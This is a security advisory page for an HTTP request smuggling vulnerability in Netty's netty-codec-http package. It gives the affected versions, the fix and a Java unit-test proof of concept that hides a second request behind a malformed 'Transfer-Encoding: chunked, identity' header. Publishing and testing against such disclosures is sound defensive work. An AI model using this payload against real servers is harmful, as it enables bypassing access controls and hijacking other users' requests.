Homepage

HTTP Request Smuggling Affecting io.netty:netty-codec-http package, versions [,4.1.133.Final)[4.2.0.Alpha1,4.2.13.Final)

Severity

 Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JAVA-IONETTY-16438737
  • published7 May 2026
  • disclosed7 May 2026
  • creditVioleta Georgieva
Report a new vulnerability Found a mistake?

Introduced: 7 May 2026

NewCVE-2026-42585  (opens in a new tab)
CWE-444  (opens in a new tab)

How to fix?

Upgrade io.netty:netty-codec-http to version 4.1.133.Final, 4.2.13.Final or higher.

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling when parsed HTTP requests contain malformed Transfer-Encoding headers. An attacker can inject unauthorized HTTP requests by crafting a request with a Transfer-Encoding: chunked, identity header, which is incorrectly interpreted, allowing the attacker to smuggle additional requests through the connection.

PoC

@Test
    public void test() {
        String requestStr = "POST / HTTP/1.1\r\n" +
                "Host: localhost\r\n" +
                "Transfer-Encoding: chunked, identity\r\n" +
                "Content-Length: 48\r\n" +
                "\r\n" +
                "0\r\n" +
                "\r\n" +
                "GET /smuggled HTTP/1.1\r\n" +
                "Host: localhost\r\n" +
                "\r\n";

        EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
        assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

        // Request 1
        HttpRequest request = channel.readInbound();
        assertTrue(request.decoderResult().isSuccess());
        assertTrue(request.headers().contains("Transfer-Encoding"));
        assertFalse(request.headers().contains("Content-Length"));
        LastHttpContent last = channel.readInbound();
        assertTrue(last.decoderResult().isSuccess());
        last.release();

        // Request 2
        request = channel.readInbound();
        assertTrue(request.decoderResult().isSuccess());
        last = channel.readInbound();
        assertTrue(last.decoderResult().isSuccess());
        last.release();
    }

CVSS Base Scores

version 4.0
version 3.1